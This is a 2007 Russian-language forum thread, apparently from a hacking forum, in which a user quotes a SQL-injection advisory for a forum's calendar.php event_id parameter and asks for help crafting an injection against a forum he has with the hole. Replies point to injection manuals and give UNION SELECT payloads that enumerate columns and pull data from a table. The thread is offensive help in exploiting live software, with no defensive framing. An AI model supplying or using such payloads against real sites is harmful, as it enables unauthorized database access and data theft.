Помогите составить запрос инъекции

Помогите составить запрос инъекции

25.02.2007, 22:11

FoGorm

Познающий

Регистрация: 04.01.2006

Сообщений: 55

С нами: 10709084

Репутация: 10

Помогите составить запрос инъекции

Вопрос знающим людям.

Цитата:

В скрипте calendar.php в функции cal_event_save( $type='add' ) отсутствует проверка на тип в переменной event_id

Код:
$event_id = $this->ipsclass->input['event_id'];
Далее эта переменная подставляется напрямую в запрос к БД

Код:
$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'cal_events', 'where' => "event_id=$event_id" ) );

и еще один запрос. Это позволяет модифицировать запрос к базе данных

Код:
http://path_to_forum/index.php?act=calendar&code=doedit&type=qqq&event_ id=your_SQL

Та вот имею форум с такой уязвимостью. Помогите составить какую-то пробную инъекцию, при помощи этого параметра event_id.
За ранее благодарен.

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось FoGorm; 25.02.2007 в 22:20..

26.02.2007, 07:04

aka PSIH

Постоянный

Регистрация: 07.02.2006

Сообщений: 630

С нами: 10660753

Репутация: 676

Почитай маны по sql-injection
ссылки можно найти тут
http://forum.web-hack.ru/index.php?showtopic=46504

начинай с
union select null, null, null/* и т.д

Последний раз редактировалось aka PSIH; 26.02.2007 в 07:06..

26.02.2007, 07:17

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

1 'select' => '*', 'from' => 'cal_events', 'where' => "event_id=999999 union select 1,2,3,4,...,100"
2 'select' => '*', 'from' => 'cal_events', 'where' => "event_id=999999 union select 1,2,3,4,...,100 from cal_table"
3 'select' => '*', 'from' => 'cal_events', 'where' => "event_id=999999 union select 1,column,3,4,...,100 from cal_table"

Внести депозит

Депозит создан

Вывести депозит